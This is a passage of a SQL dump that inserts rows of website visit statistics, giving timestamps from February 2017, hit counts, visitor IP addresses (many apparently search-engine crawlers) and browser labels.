'66.249.69.52','chrome'),(89392,1487727234,1,0,1,0,'207.46.13.59',''),(89393,1487727251,1,0,1,0,'66.249.75.22',''),(89394,1487727491,1,1,0,0,'66.249.75.28','chrome'),(89395,1487728511,1,1,0,0,'164.132.161.97','other'),(89396,1487728601,1,1,0,0,'164.132.161.51','other'),(89397,1487729087,1,1,0,0,'163.172.64.216','other'),(89398,1487729380,1,1,0,0,'164.132.161.86','other'),(89399,1487729432,1,1,0,0,'217.69.133.229','other'),(89400,1487729508,1,1,0,0,'51.255.65.71','other'),(89401,1487730206,1,1,0,0,'207.46.13.59','other'),(89402,1487730349,1,1,0,0,'51.255.65.87','other'),(89403,1487730765,1,1,0,0,'66.249.75.28','chrome'),(89404,1487731026,1,1,0,0,'164.132.161.96','other'),(89405,1487731326,1,0,1,0,'66.249.69.60',''),(89406,1487732477,1,0,1,0,'66.249.75.25',''),(89407,1487732575,1,0,1,0,'66.249.69.52',''),(89408,1487732725,1,0,1,0,'66.249.75.22',''),(89409,1487733543,1,1,0,0,'66.249.69.60','chrome'),(89410,1487733584,1,0,1,0,'66.249.69.52',''),(89411,1487733758,2,0,2,0,'66.249.69.56',''),(89412,1487734407,1,1,0,0,'13.92.113.81','firefox'),(89413,1487734444,1,0,1,0,'66.249.75.22',''),(89414,1487734811,1,1,0,0,'164.132.161.30','other'),(89415,1487734955,1,1,0,0,'164.132.161.26','other'),(89416,1487735866,1,1,0,0,'164.132.161.48','other'),(89417,1487736548,1,0,1,0,'66.249.75.28',''),(89418,1487737061,1,1,0,0,'51.255.65.68','other'),(89419,1487737293,1,1,0,0,'66.249.75.25','chrome'),(89420,1487737477,1,0,1,0,'66.249.69.56',''),(89421,1487740584,1,0,1,0,'66.249.75.22',''),(89422,1487740815,1,0,1,0,'66.249.69.60',''),(89423,1487741182,1,1,0,0,'164.132.161.55','other'),(89424,1487741612,1,1,0,0,'66.249.69.52','chrome'),(89425,1487741952,1,1,0,0,'163.172.64.225','other'),(89426,1487741974,1,1,0,0,'207.46.13.59','other'),(89427,1487742147,1,1,0,0,'91.196.178.66','firefox'),(89428,1487742541,1,0,1,0,'66.249.69.56',''),(89429,1487742656,1,1,0,0,'207.241.231.163','other'),(89430,1487743379,1,1,0,0,'91.196.178.66','firefox'),(89431,1487744492,2,2,0,0,'91.196.178.66','chrome'),(89432,1487744744,1,0,1,0,'66.249.69.56',''),(89433,1487745038,3,0,3,0,'66.249.69.52',''),(89434,1487745294,1,0,1,0,'66.249.75.25',''),(89435,1487745428,1,1,0,0,'77.93.43.54','firefox'),(89436,1487745453,1,1,0,0,'130.193.50.34','other'),(89437,1487745694,1,1,0,0,'51.255.65.75','other'),(89438,1487745999,1,1,0,0,'66.249.75.28','chrome'),(89439,1487746039,2,1,1,0,'66.249.69.56',''),(89440,1487746086,1,1,0,0,'66.102.9.29','chrome'),(89441,1487747109,1,1,0,0,'91.196.177.46','chrome'),(89442,1487747850,1,1,0,0,'37.53.139.244','chrome'),(89443,1487747873,1,1,0,0,'130.193.50.34','other'),(89444,1487748004,1,1,0,0,'163.172.64.244','other'),(89445,1487748186,1,1,0,0,'95.132.50.64','chrome'),(89446,1487748399,1,1,0,0,'51.255.65.94','other'),(89447,1487748506,1,1,0,0,'178.92.72.110','firefox'),(89448,1487748849,1,1,0,0,'130.180.217.76','firefox'),(89449,1487749928,1,1,0,0,'163.172.64.177','other'),(89450,1487750023,1,1,0,0,'83.233.207.74','other'),(89451,1487750235,1,1,0,0,'51.255.65.78','other'),(89452,1487750627,1,1,0,0,'178.92.72.110','firefox'),(89453,1487751277,1,1,0,0,'157.55.39.250','other'),(89454,1487751322,1,1,0,0,'164.132.161.59','other'),(89455,1487751665,1,1,0,0,'77.120.162.15','chrome'),(89456,1487752010,1,1,0,0,'164.132.161.9','other'),(89457,1487752551,1,0,1,0,'157.55.39.250',''),(89458,1487752634,1,1,0,0,'66.249.75.28','chrome'),(89459,1487752638,1,1,0,0,'66.249.69.52','chrome'),(89460,1487753038,1,0,1,0,'66.249.69.60',''),(89461,1487753101,1,0,1,0,'66.249.75.25',''),(89462,1487753519,1,1,0,0,'91.196.177.15','chrome'),(89463,1487753760,1,0,1,0,'66.249.69.56',''),(89464,1487753761,1,0,1,0,'66.249.69.52',''),(89465,1487754207,1,0,1,0,'66.249.69.60',''),(89466,1487754346,1,1,0,0,'94.179.52.115','firefox'),(89467,1487755374,1,0,1,0,'66.249.69.56',''),(89468,1487755767,1,1,0,0,'8.37.233.19','other'),(89469,1487756395,1,1,0,0,'178.140.154.137','firefox'),(89470,1487756415,1,1,0,0,'91.196.177.26','chrome'),(89471,1487757098,1,1,0,0,'164.132.161.21','other'),(89472,1487757320,1,1,0,0,'46.200.107.68','chrome'),(89473,1487757518,1,1,0,0,'91.196.178.33','chrome'),(89474,1487757589,1,1,0,0,'66.249.75.25','chrome'),(89475,1487757591,1,1,0,0,'66.249.69.56','chrome'),(89476,1487757814,1,1,0,0,'51.255.65.46','other'),(89477,1487758176,1,1,0,0,'46.133.26.26','firefox'),(89478,1487758297,1,0,1,0,'66.249.69.52',''),(89479,1487759361,1,1,0,0,'82.207.91.234','firefox'),(89480,1487759691,1,1,0,0,'163.172.64.251','other'),(89481,1487760077,1,1,0,0,'46.201.46.225','chrome'),(89482,1487760359,2,2,0,0,'141.0.13.47','other'),(89483,1487760606,1,1,0,0,'51.255.65.2','other'),(89484,1487760845,1,0,1,0,'66.249.75.22',''),(89485,1487760851,1,1,0,0,'176.195.109.220','chrome'),(89486,1487761264,1,1,0,0,'40.77.167.114','other'),(89487,1487761442,1,1,0,0,'164.132.161.60','other'),(89488,1487761473,1,1,0,0,'164.132.161.13','other'),(89489,1487761819,1,1,0,0,'91.196.178.66','chrome'),(89490,1487762725,1,1,0,0,'157.55.39.250','other'),(89491,1487762911,1,0,1,0,'66.249.69.60',''),(89492,1487763169,1,1,0,0,'95.133.58.202','chrome'),(89493,1487763522,1,1,0,0,'51.255.65.25','other'),(89494,1487763560,1,0,1,0,'66.249.69.52',''),(89495,1487764048,1,1,0,0,'199.58.86.206','other'),(89496,1487764316,1,1,0,0,'66.249.69.52','chrome'),(89497,1487764318,1,1,0,0,'66.249.75.22','chrome'),(89498,1487764889,1,0,1,0,'157.55.39.93',''),(89499,1487764917,1,1,0,0,'163.172.64.199','other'),(89500,1487765390,1,1,0,0,'164.132.161.21','other'),(89501,1487765686,1,1,0,0,'91.204.196.58','chrome'),(89502,1487765696,1,1,0,0,'141.8.183.25','other'),(89503,1487766213,1,1,0,0,'164.132.161.20','other'),(89504,1487766337,1,0,1,0,'66.249.69.60',''),(89505,1487766554,1,1,0,0,'180.76.15.160','other'),(89506,1487766756,1,1,0,0,'95.135.212.147','firefox'),(89507,1487767198,1,1,0,0,'37.52.23.154','chrome'),(89508,1487767202,1,1,0,0,'164.132.161.25','other'),(89509,1487767239,1,1,0,0,'164.132.161.71','other'),(89510,1487767337,1,1,0,0,'164.132.161.95','other'),(89511,1487767443,1,0,1,0,'66.249.69.52',''),(89512,1487767770,1,1,0,0,'91.196.178.72','firefox'),(89513,1487768043,1,1,0,0,'164.132.161.26','other'),(89514,1487768210,1,1,0,0,'91.196.178.167','chrome'),(89515,1487768250,1,1,0,0,'94.179.52.115','firefox'),(89516,1487768555,1,1,0,0,'40.77.167.114','other'),(89517,1487768818,1,0,1,0,'66.249.75.28',''),(89518,1487769165,1,1,0,0,'51.255.65.20','other'),(89519,1487769275,1,1,0,0,'164.132.161.29','other'),(89520,1487769370,1,1,0,0,'91.196.178.70','firefox'),(89521,1487769791,1,1,0,0,'91.196.178.67','firefox'),(89522,1487770742,1,1,0,0,'164.132.161.21','other'),(89523,1487770939,1,1,0,0,'91.196.178.66','chrome'),(89524,1487771803,2,0,2,0,'68.180.229.99',''),(89525,1487771837,1,0,1,0,'66.249.69.56',''),(89526,1487772021,1,1,0,0,'51.255.65.62','other'),(89527,1487772145,1,0,1,0,'66.249.75.28',''),(89528,1487772146,1,1,0,0,'164.132.161.32','other'),(89530,1487772150,1,1,0,0,'91.196.178.66','chrome'),(89531,1487772341,1,1,0,0,'66.249.69.56','chrome'),(89532,1487772925,1,1,0,0,'164.132.161.41','other'),(89533,1487773334,1,1,0,0,'163.172.64.225','other'),(89534,1487773469,1,0,1,0,'66.249.69.52',''),(89535,1487773937,1,0,1,0,'66.249.75.25',''),(89536,1487773950,1,1,0,0,'91.196.178.136','firefox'),(89537,1487774091,1,1,0,0,'66.249.75.25','chrome'),(89538,1487774109,1,1,0,0,'91.196.177.26','chrome'),(89539,1487774900,1,1,0,0,'66.249.93.156','chrome'),(89540,1487774952,1,1,0,0,'163.172.64.223','other'),(89541,1487775362,1,0,1,0,'66.249.69.52',''),(89542,1487775822,1,1,0,0,'31.43.1.29','chrome'),(89543,1487776295,1,1,0,0,'51.255.65.32','other'),(89544,1487776626,1,1,0,0,'128.72.208.243','msie'),(89545,1487777141,1,1,0,0,'91.196.178.70','firefox'),(89546,1487777589,1,1,0,0,'51.255.65.34','other'),(89547,1487777693,1,1,0,0,'163.172.64.232','other'),(89548,1487777772,1,1,0,0,'51.255.65.3','other'),(89549,1487777997,1,1,0,0,'91.196.178.166','msie'),(89550,1487778457,1,1,0,0,'176.195.175.129','chrome'),(89551,1487778951,1,1,0,0,'163.172.64.239','other'),(89552,1487779121,1,1,0,0,'51.255.65.63','other'),(89553,1487779866,1,1,0,0,'51.255.65.5','other'),(89554,1487779875,2,2,0,0,'91.196.178.39','chrome'),(89555,1487779887,1,1,0,0,'66.249.69.52','chrome'),(89556,1487779901,1,1,0,0,'66.249.75.28','chrome'),(89557,1487781233,1,1,0,0,'82.207.26.224','chrome'),(89558,1487781295,1,1,0,0,'51.255.65.66','other'),(89559,1487781781,1,1,0,0,'194.50.254.170','chrome'),(89560,1487782262,2,0,2,0,'66.249.69.52',''),(89561,1487783289,1,1,0,0,'51.255.65.8','other'),(89562,1487784095,1,0,1,0,'66.249.69.52',''),(89563,1487784106,1,1,0,0,'51.255.65.97','other'),(89564,1487784794,1,0,1,0,'66.249.69.56',''),(89565,1487785282,1,0,1,0,'66.249.69.52',''),(89566,1487785368,1,1,0,0,'91.196.178.37','chrome'),(89567,1487785409,1,1,0,0,'51.255.65.26','other'),(89568,1487786928,1,0,1,0,'66.249.69.52',''),(89569,1487787056,1,1,0,0,'164.132.161.68','other'),(89570,1487788364,1,0,1,0,'66.249.69.52',''),(89571,1487788860,1,1,0,0,'164.132.161.82','other'),(89572,1487788989,1,1,0,0,'66.249.69.60','chrome'),(89573,1487788991,1,1,0,0,'66.249.75.25','chrome'),(89574,1487789119,1,1,0,0,'46.211.114.200','other'),(89575,1487789635,1,1,0,0,'51.255.65.64','other'),(89576,1487789819,1,1,0,0,'164.132.161.48','other'),(89577,1487790241,2,0,2,0,'66.249.69.60',''),(89578,1487790830,1,1,0,0,'164.132.161.29','other'),(89579,1487791065,1,0,1,0,'66.249.69.52',''),(89580,1487791275,1,1,0,0,'164.132.161.56','other'),(89581,1487792433,1,0,1,0,'66.249.69.60',''),(89582,1487792756,1,0,1,0,'66.249.69.52',''),(89583,1487793500,1,1,0,0,'94.179.97.218','firefox'),(89584,1487794517,1,1,0,0,'51.255.65.69','other'),(89585,1487795203,1,0,1,0,'66.249.69.52',''),(89586,1487795476,1,1,0,0,'163.172.73.28','other'),(89587,1487795622,1,1,0,0,'51.255.65.66','other'),(89588,1487795626,1,1,0,0,'164.132.161.10','other'),(89589,1487796500,1,1,0,0,'66.249.69.52','chrome'),(89590,1487796502,1,1,0,0,'66.249.75.13','chrome'),(89591,1487797608,1,0,1,0,'66.249.69.52',''),(89592,1487798147,1,1,0,0,'163.172.64.222','other'),(89593,1487798207,1,0,1,0,'66.249.75.25',''),(89594,1487798744,1,1,0,0,'51.255.65.18','other'),(89595,1487798841,1,1,0,0,'164.132.161.52','other'),(89596,1487798896,1,0,1,0,'66.249.69.56',''),(89597,1487798999,1,1,0,0,'157.55.39.93','other'),(89598,1487800731,1,0,1,0,'66.249.75.28',''),(89599,1487801166,1,1,0,0,'51.255.65.76','other'),(89600,1487801251,1,1,0,0,'163.172.64.183','other'),(89601,1487801520,1,1,0,0,'163.172.64.228','other'),(89602,1487801723,1,1,0,0,'51.255.65.34','other'),(89603,1487802540,1,1,0,0,'51.255.65.77','other'),(89604,1487802795,1,1,0,0,'178.154.189.31','other'),(89605,1487802921,1,1,0,0,'164.132.161.65','other'),(89606,1487803340,1,0,1,0,'66.249.69.56',''),(89607,1487803363,1,1,0,0,'130.193.50.6','other'),(89608,1487803367,1,1,0,0,'141.8.183.19','other'),(89609,1487803371,1,1,0,0,'141.8.142.58','other'),(89610,1487804790,1,1,0,0,'207.46.13.59','other'),(89611,1487804824,1,0,1,0,'66.249.69.56',''),(89612,1487804934,1,1,0,0,'180.76.15.155','other'),(89613,1487804950,1,1,0,0,'51.255.65.62','other'),(89614,1487805070,1,1,0,0,'93.158.152.40','other'),(89615,1487805091,1,1,0,0,'66.249.69.52','chrome'),(89616,1487805165,1,1,0,0,'93.158.152.51','other'),(89617,1487805599,1,1,0,0,'66.249.75.22','chrome'),(89618,1487805670,2,2,0,0,'5.255.253.67','other'),(89619,1487805675,1,1,0,0,'141.8.142.62','other'),(89620,1487805682,1,1,0,0,'141.8.132.52','other'),(89621,1487806509,1,1,0,0,'51.255.65.19','other'),(89622,1487806909,1,1,0,0,'51.255.65.27','other'),(89623,1487807035,1,1,0,0,'141.8.142.85','other'),(89624,1487807039,1,1,0,0,'130.193.50.34','other'),(89625,1487807047,1,1,0,0,'178.154.189.31','other'),(89626,1487807135,1,1,0,0,'130.193.51.74','other'),(89627,1487807865,1,1,0,0,'51.255.65.59','other'),(89628,1487808616,1,0,1,0,'66.249.69.56',''),(89629,1487809526,1,1,0,0,'5.255.253.68','other'),(89630,1487809964,1,0,1,0,'66.249.75.25',''),(89631,1487810010,1,0,1,0,'66.249.75.28',''),(89632,1487810142,1,1,0,0,'69.163.193.49','firefox'),(89633,1487810406,1,1,0,0,'141.8.132.10','other'),(89634,1487810418,2,2,0,0,'141.8.142.206','other'),(89635,1487810425,1,1,0,0,'130.193.51.14','other'),(89636,1487810432,1,1,0,0,'178.154.189.31','other'),(89637,1487810435,1,1,0,0,'93.158.152.40','other'),(89638,1487810820,1,1,0,0,'130.193.50.6','other'),(89639,1487810833,1,1,0,0,'141.8.142.25','other'),(89640,1487810836,1,1,0,0,'141.8.142.61','other'),(89641,1487810840,1,1,0,0,'5.255.253.47','other'),(89642,1487810948,1,1,0,0,'93.158.152.51','other'),(89643,1487810963,1,1,0,0,'141.8.142.10','other'),(89644,1487811083,1,1,0,0,'164.132.161.61','other'),(89645,1487811127,1,1,0,0,'51.255.65.96','other'),(89646,1487811299,1,1,0,0,'164.132.161.77','other'),(89647,1487811710,1,0,1,0,'66.249.75.25',''),(89648,1487811714,1,1,0,0,'164.132.161.19','other'),(89649,1487811892,1,1,0,0,'178.154.189.37','other'),(89650,1487812053,1,1,0,0,'130.193.51.14','other'),(89651,1487812102,1,0,1,0,'66.249.69.56',''),(89652,1487812485,1,1,0,0,'164.132.161.85','other'),(89653,1487812841,1,1,0,0,'164.132.161.50','other'),(89654,1487812896,1,1,0,0,'130.193.51.45','other'),(89655,1487812899,1,1,0,0,'141.8.142.167','other'),(89656,1487813062,2,2,0,0,'141.8.142.67','other'),(89657,1487813170,1,1,0,0,'130.193.51.43','other'),(89658,1487813332,1,1,0,0,'164.132.161.44','other'),(89659,1487814116,1,1,0,0,'141.8.183.25','other'),(89660,1487814122,1,1,0,0,'130.193.51.19','other'),(89661,1487814276,1,1,0,0,'51.255.65.49','other'),(89662,1487814552,4,4,0,0,'130.193.50.34','other'),(89663,1487814574,1,1,0,0,'163.172.64.254','other'),(89664,1487814622,2,2,0,0,'141.8.142.67','other'),(89665,1487814826,1,1,0,0,'141.8.142.61','other'),(89666,1487814844,1,1,0,0,'141.8.142.175','other'),(89667,1487814870,1,1,0,0,'130.193.51.74','other'),(89668,1487814904,1,1,0,0,'130.193.50.6','other'),(89669,1487815769,1,1,0,0,'141.8.183.19','other'),(89670,1487815867,1,1,0,0,'207.46.13.59','other'),(89671,1487815887,1,0,1,0,'66.249.75.25',''),(89672,1487816098,1,1,0,0,'164.132.161.43','other'),(89673,1487816336,1,1,0,0,'141.8.142.61','other'),(89674,1487816344,1,1,0,0,'164.132.161.95','other'),(89675,1487816744,1,1,0,0,'178.154.189.31','other'),(89676,1487816747,1,1,0,0,'130.193.50.34','other'),(89677,1487817006,1,1,0,0,'163.172.64.180','other'),(89678,1487817231,1,1,0,0,'163.172.64.231','other'),(89679,1487817288,1,1,0,0,'130.193.50.38','other'),(89680,1487817306,1,1,0,0,'163.172.64.191','other'),(89681,1487817352,1,1,0,0,'51.255.65.96','other'),(89682,1487817692,1,1,0,0,'141.8.142.58','other'),(89683,1487818043,1,0,1,0,'66.249.69.60',''),(89684,1487818758,2,0,2,0,'66.249.69.56',''),(89685,1487819850,2,2,0,0,'141.8.142.67','other'),(89686,1487819859,1,1,0,0,'141.8.183.25','other'),(89687,1487819883,1,1,0,0,'207.46.13.59','other'),(89688,1487821442,1,1,0,0,'157.55.39.93','other'),(89689,1487821630,1,1,0,0,'51.255.65.8','other'),(89690,1487821787,1,1,0,0,'51.255.65.91','other'),(89691,1487821790,1,1,0,0,'51.255.65.44','other'),(89692,1487821829,1,0,1,0,'66.249.75.25',''),(89693,1487822818,1,1,0,0,'51.255.65.35','other'),(89694,1487823528,1,1,0,0,'164.132.161.65','other'),(89695,1487823728,1,1,0,0,'163.172.64.185','other'),(89696,1487823956,1,1,0,0,'164.132.161.6','other'),(89697,1487828204,1,1,0,0,'91.196.178.71','firefox'),(89698,1487828214,1,0,1,0,'66.249.75.28',''),(89699,1487828719,1,1,0,0,'164.132.161.70','other'),(89700,1487828918,1,1,0,0,'217.69.133.169','firefox'),(89701,1487828919,2,2,0,0,'91.200.12.15','msie'),(89702,1487829055,1,1,0,0,'164.132.161.74','other'),(89703,1487829658,1,1,0,0,'163.172.73.28','other'),(89704,1487829661,1,1,0,0,'66.249.69.60','chrome'),(89705,1487830189,25,25,0,0,'163.172.68.136','other'),(89706,1487831115,1,1,0,0,'51.255.65.29','other'),(89707,1487831317,1,1,0,0,'91.196.178.72','firefox'),(89708,1487831808,1,0,1,0,'66.249.69.52',''),(89709,1487832092,1,1,0,0,'51.255.65.53','other'),(89710,1487832120,1,1,0,0,'66.102.9.25','chrome'),(89711,1487832172,1,0,1,0,'68.180.230.114',''),(89712,1487832366,1,1,0,0,'91.196.178.66','chrome'),(89713,1487832806,1,1,0,0,'51.255.65.89','other'),(89714,1487833135,1,1,0,0,'91.204.196.58','chrome'),(89715,1487833159,1,1,0,0,'163.172.64.199','other'),(89716,1487833252,1,0,1,0,'66.249.69.56',''),(89717,1487834121,1,1,0,0,'51.255.65.63','other'),(89718,1487834264,1,1,0,0,'163.172.64.245','other'),(89719,1487834434,1,1,0,0,'130.180.216.233','firefox'),(89720,1487834733,1,1,0,0,'37.52.17.158','chrome'),(89721,1487834863,1,1,0,0,'66.249.75.22','chrome'),(89722,1487835237,1,1,0,0,'91.196.178.66','chrome'),(89723,1487835610,1,1,0,0,'51.255.65.3','other'),(89724,1487835621,1,1,0,0,'51.255.65.41','other'),(89725,1487835642,1,1,0,0,'91.196.178.66','firefox'),(89726,1487836247,1,0,1,0,'66.249.75.28',''),(89727,1487836471,1,0,1,0,'66.249.75.25',''),(89728,1487836510,1,1,0,0,'91.196.178.71','firefox'),(89729,1487837242,1,1,0,0,'51.255.65.62','other'),(89730,1487837267,1,1,0,0,'82.207.91.234','firefox'),(89731,1487837405,1,1,0,0,'91.196.177.15','chrome'),(89732,1487837693,1,1,0,0,'51.255.65.22','other'),(89733,1487838358,1,1,0,0,'193.107.72.66','chrome'),(89734,1487838601,1,1,0,0,'91.196.178.66','firefox'),(89735,1487838669,1,0,1,0,'66.249.69.52',''),(89736,1487839097,1,1,0,0,'51.255.65.48','other'),(89737,1487839098,1,1,0,0,'178.92.72.110','firefox'),(89738,1487839150,1,1,0,0,'46.200.100.147','opera'),(89739,1487839273,1,1,0,0,'164.132.161.36','other'),(89740,1487839450,1,1,0,0,'46.201.112.175','chrome'),(89741,1487839462,1,1,0,0,'180.76.15.136','other'),(89742,1487839990,2,2,0,0,'46.164.130.92','firefox'),(89743,1487840001,1,1,0,0,'141.8.142.58','other'),(89744,1487840039,1,1,0,0,'178.92.72.110','firefox'),(89745,1487840807,1,0,1,0,'66.249.75.25',''),(89746,1487840860,1,1,0,0,'51.255.65.9','other'),(89747,1487840984,1,1,0,0,'66.249.75.28','chrome'),(89748,1487841177,1,1,0,0,'164.132.161.90','other'),(89749,1487841385,1,1,0,0,'91.196.177.46','chrome'),(89750,1487841545,1,1,0,0,'164.132.161.81','other'),(89751,1487841631,1,1,0,0,'46.201.240.112','firefox'),(89752,1487841642,1,1,0,0,'51.255.65.61','other'),(89753,1487841668,1,1,0,0,'109.108.88.165','chrome'),(89754,1487841766,1,1,0,0,'91.196.178.72','firefox'),(89755,1487841838,1,1,0,0,'51.255.65.7','other'),(89756,1487842542,1,1,0,0,'163.172.64.187','other'),(89757,1487842682,1,1,0,0,'51.255.65.92','other'),(89758,1487842873,1,1,0,0,'51.255.65.48','other'),(89759,1487842909,1,0,1,0,'66.249.69.60',''),(89760,1487843034,1,0,1,0,'66.249.75.22',''),(89761,1487843192,1,1,0,0,'91.196.177.15','chrome'),(89762,1487843243,1,1,0,0,'91.196.178.66','chrome'),(89763,1487843969,1,1,0,0,'51.255.65.63','other'),(89764,1487844028,1,1,0,0,'91.196.177.46','chrome'),(89765,1487844600,1,1,0,0,'163.172.64.253','other'),(89766,1487844822,1,1,0,0,'164.132.161.80','other'),(89767,1487844876,1,0,1,0,'66.249.69.60',''),(89768,1487844915,1,1,0,0,'51.255.65.91','other'),(89769,1487845018,1,1,0,0,'157.55.39.44','other'),(89770,1487845046,1,1,0,0,'31.43.5.249','chrome'),(89771,1487845118,1,1,0,0,'91.196.178.72','firefox'),(89772,1487845430,1,1,0,0,'164.132.161.54','other'),(89773,1487846093,1,1,0,0,'91.196.178.66','firefox'),(89774,1487846696,1,1,0,0,'91.196.178.72','firefox'),(89775,1487847542,1,0,1,0,'157.55.39.44',''),(89776,1487848050,1,1,0,0,'51.255.65.53','other'),(89777,1487848551,1,1,0,0,'95.135.91.197','chrome'),(89778,1487848881,1,0,1,0,'207.46.13.59',''),(89779,1487849190,1,1,0,0,'91.196.178.68','firefox'),(89780,1487849414,1,0,1,0,'66.249.75.22',''),(89781,1487849737,1,1,0,0,'180.76.15.135','other'),(89782,1487850296,1,1,0,0,'163.172.64.251','other'),(89783,1487850334,1,1,0,0,'163.172.71.21','other'),(89784,1487850335,1,1,0,0,'91.196.178.168','firefox'),(89785,1487850419,1,1,0,0,'95.135.240.193','firefox'),(89786,1487850440,1,1,0,0,'164.132.161.71','other'),(89787,1487851183,1,1,0,0,'91.196.178.162','chrome'),(89788,1487851636,1,1,0,0,'164.132.161.81','other'),(89789,1487851813,1,1,0,0,'51.255.65.13','other'),(89790,1487851854,2,0,2,0,'68.180.229.99',''),(89791,1487852102,1,0,1,0,'66.249.69.56',''),(89792,1487852109,1,1,0,0,'91.196.178.66','chrome'),(89793,1487852225,1,1,0,0,'91.196.178.162','chrome'),(89794,1487852383,1,0,1,0,'66.249.69.60',''),(89795,1487852902,1,1,0,0,'91.196.177.26','chrome'),(89796,1487852912,1,1,0,0,'164.132.161.38','other'),(89797,1487853039,1,1,0,0,'164.132.161.21','other'),(89798,1487853042,1,1,0,0,'91.196.178.131','firefox'),(89799,1487853199,1,1,0,0,'46.200.155.1','chrome'),(89800,1487853629,1,1,0,0,'91.196.178.70','chrome'),(89801,1487853770,1,1,0,0,'51.255.65.12','other'),(89802,1487853773,1,1,0,0,'207.46.13.59','other'),(89803,1487854177,1,1,0,0,'164.132.161.14','other'),(89804,1487854208,1,1,0,0,'91.196.177.46','chrome'),(89805,1487854274,1,0,1,0,'66.249.75.28',''),(89806,1487854342,1,1,0,0,'185.138.228.160','opera'),(89807,1487855138,1,1,0,0,'157.55.39.93','other'),(89808,1487855164,1,1,0,0,'95.132.36.171','chrome'),(89809,1487855175,1,1,0,0,'164.132.161.82','other'),(89810,1487855523,1,1,0,0,'66.249.93.155','chrome'),(89811,1487855606,1,1,0,0,'164.132.161.54','other'),(89812,1487855648,1,1,0,0,'91.196.178.162','chrome'),(89813,1487855901,1,1,0,0,'163.172.71.225','other'),(89814,1487856250,1,1,0,0,'91.196.178.65','chrome'),(89815,1487856414,1,1,0,0,'91.196.178.70','chrome'),(89816,1487857267,1,1,0,0,'95.135.240.193','firefox'),(89817,1487857850,1,0,1,0,'40.77.167.114',''),(89818,1487858036,1,1,0,0,'141.8.142.175','other'),(89819,1487858330,1,1,0,0,'91.196.178.68','firefox'),(89820,1487858672,1,1,0,0,'95.135.240.193','firefox'),(89821,1487858685,1,0,1,0,'157.55.39.93',''),(89822,1487859272,1,1,0,0,'92.112.38.177','firefox'),(89823,1487859367,1,0,1,0,'66.249.69.60',''),(89824,1487859403,1,0,1,0,'66.249.75.28',''),(89825,1487859478,1,1,0,0,'82.145.223.86','other'),(89826,1487859487,1,0,1,0,'66.249.69.56',''),(89827,1487859683,1,1,0,0,'95.24.120.24','msie'),(89828,1487859708,1,1,0,0,'66.249.69.52','chrome'),(89829,1487859925,1,1,0,0,'163.172.64.238','other'),(89830,1487860175,1,1,0,0,'94.179.37.20','firefox'),(89831,1487860356,1,1,0,0,'164.132.161.30','other'),(89832,1487860568,1,1,0,0,'163.172.64.183','other'),(89833,1487860575,1,1,0,0,'162.210.196.97','other'),(89834,1487860601,1,1,0,0,'91.196.178.66','other'),(89835,1487860674,1,1,0,0,'51.255.65.12','other'),(89836,1487860815,1,1,0,0,'91.196.178.104','chrome'),(89837,1487861362,1,1,0,0,'180.76.15.136','other'),(89838,1487861768,1,1,0,0,'176.195.117.207','msie'),(89839,1487862532,1,1,0,0,'51.255.65.49','other'),(89840,1487862625,1,1,0,0,'128.68.53.76','msie'),(89841,1487862674,2,2,0,0,'91.196.178.168','chrome'),(89842,1487862795,1,1,0,0,'193.194.127.217','firefox'),(89843,1487863377,1,0,1,0,'66.249.69.56',''),(89844,1487863658,1,1,0,0,'157.55.39.93','other'),(89845,1487863765,1,1,0,0,'91.196.178.167','msie'),(89846,1487864193,1,1,0,0,'164.132.161.53','other'),(89847,1487864635,1,0,1,0,'66.249.75.28',''),(89848,1487864674,1,1,0,0,'51.255.65.73','other'),(89849,1487864927,1,1,0,0,'91.196.178.33','chrome'),(89850,1487865065,1,1,0,0,'164.132.161.70','other'),(89851,1487865515,1,1,0,0,'66.102.9.38','chrome'),(89852,1487867080,1,1,0,0,'46.211.124.163','chrome'),(89853,1487867184,1,0,1,0,'66.249.69.52',''),(89854,1487867595,2,2,0,0,'195.154.181.15','chrome'),(89855,1487867724,1,1,0,0,'180.76.15.143','other'),(89856,1487868196,1,1,0,0,'91.196.178.129','chrome'),(89857,1487869028,1,0,1,0,'66.249.75.28',''),(89858,1487869602,1,1,0,0,'51.255.65.14','other'),(89859,1487869613,1,1,0,0,'51.255.65.49','other'),(89860,1487869770,1,1,0,0,'164.132.161.28','other'),(89861,1487869893,1,0,1,0,'66.249.69.60',''),(89862,1487869995,2,2,0,0,'37.55.59.74','chrome'),(89863,1487870360,3,0,3,0,'66.249.75.28',''),(89864,1487870814,1,1,0,0,'91.196.178.67','firefox'),(89865,1487870912,1,1,0,0,'94.179.49.11','chrome'),(89866,1487871078,4,0,4,0,'66.249.75.22',''),(89867,1487871120,1,1,0,0,'164.132.161.13','other'),(89868,1487871381,1,1,0,0,'164.132.161.11','other'),(89869,1487871435,5,0,5,0,'66.249.69.56',''),(89870,1487871500,9,0,9,0,'66.249.69.52',''),(89871,1487871506,3,1,2,0,'66.249.75.22',''),(89872,1487871561,3,0,3,0,'66.249.75.28',''),(89873,1487871578,3,0,3,0,'66.249.75.25',''),(89874,1487871713,1,0,1,0,'66.249.69.60',''),(89875,1487871739,1,1,0,0,'91.196.178.67','firefox'),(89876,1487871811,1,1,0,0,'141.8.142.175','other'),(89877,1487871816,1,1,0,0,'141.8.183.25','other'),(89878,1487873141,1,1,0,0,'164.132.161.76','other'),(89879,1487873345,1,0,1,0,'66.249.75.22',''),(89880,1487873679,1,1,0,0,'91.196.178.129','chrome'),(89881,1487875132,1,1,0,0,'180.76.15.23','other'),(89882,1487875371,1,1,0,0,'66.249.75.25','chrome'),(89883,1487875719,1,1,0,0,'163.172.64.190','other'),(89884,1487876325,1,1,0,0,'164.132.161.4','other'),(89885,1487877032,1,0,1,0,'66.249.69.60',''),(89886,1487877417,2,0,2,0,'66.249.69.52',''),(89887,1487877983,1,1,0,0,'66.249.75.22','chrome'),(89888,1487879006,1,1,0,0,'51.255.65.72','other'),(89889,1487879049,1,1,0,0,'164.132.161.19','other'),(89890,1487879336,1,0,1,0,'66.249.69.52',''),(89891,1487879421,1,1,0,0,'164.132.161.21','other'),(89892,1487879458,6,6,0,0,'5.9.147.133','other'),(89893,1487879679,1,1,0,0,'66.249.75.28','chrome'),(89894,1487880063,1,1,0,0,'164.132.161.53','other'),(89895,1487880413,1,1,0,0,'164.132.161.59','other'),(89896,1487880736,1,0,1,0,'66.249.69.60',''),(89897,1487880745,1,1,0,0,'51.255.65.93','other'),(89898,1487881727,1,1,0,0,'164.132.161.64','other'),(89899,1487881733,1,1,0,0,'157.55.39.93','other'),(89900,1487882019,2,2,0,0,'195.154.181.15','chrome'),(89901,1487882560,3,0,3,0,'66.249.75.22',''),(89902,1487882752,2,0,2,0,'66.249.75.25',''),(89903,1487883814,1,